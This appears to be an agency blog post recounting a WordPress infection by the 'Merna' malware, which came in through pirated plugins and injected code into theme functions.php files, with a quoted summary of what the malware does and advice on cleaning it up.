About a year ago we started a small test / pet project and ran it privately on a shared hosting account.
We brought in a contractor to do some development on it for us, which required some paid plugins. Instead of buying them, he downloaded them from “someplace” (but billed us for them), as we determined later, because within a few weeks, every single domain hosted on our shared sever had the same malicious code injected in the functions.phpfile of all of our themes.
It's referred to as Merna, and it's not new, but it seems to come back, time and time again.
This malware has been around since 2017, or least as far as we can tell, and I'm talking about it now because a year after we cleaned our system, I debugged two additional sites that had this code injected into the functions file, this week. (I can't remember if we'd cleaned that particular domain/wordpress install last year, but it being on a shared hosting plan allows the virus to hop.)
This write up talks about how it functions and what it does in greater detail and is the article we initially found when we saw the injected code in the functions file.
PRO TIP: If you're not a developer and are trying to clean up injected code, look at the injection code and pick out the URL it's sending info to – it almost always is. Then grab that and search for it online. That URL will most likely be used as an identifier by other developers, and they can help walk you through additional files that need examining. If this scares you, get some help doing this.
Here's a quote from that article:
This file, when accessed by an admin during plugin activation, would carry out a number of tasks. The more notable / important, are:
- Create a unique “install hash” and “install password”, which are seemingly registered in the attacker's database of victims for future use
- The content of the
admin.txtfile being hosted on thewww.merna.ccdomain will be injected into every theme'sfunctions.phpfile. If one does not exist, it will be created during the bootstrapping of the malware. - Code is injected into the same set of files, to allow for a remote user to patch up the files to point to a new domain.
The biggest thing about cleaning injected code is actually not being totally freaked out to do this. If you have some understanding of php, can tell where the code starts and ends and have a sense of what looks “off”, you can learn to navigate your way around it.
If you are totally NOT cool doing this, no problem. Our team cleans stuff for our clients all the time, so get in touch. Remember that even with security installed, you can't protect yourself from malware you install on the server yourself. Right? Right. (We didn't keep him around for other projects.)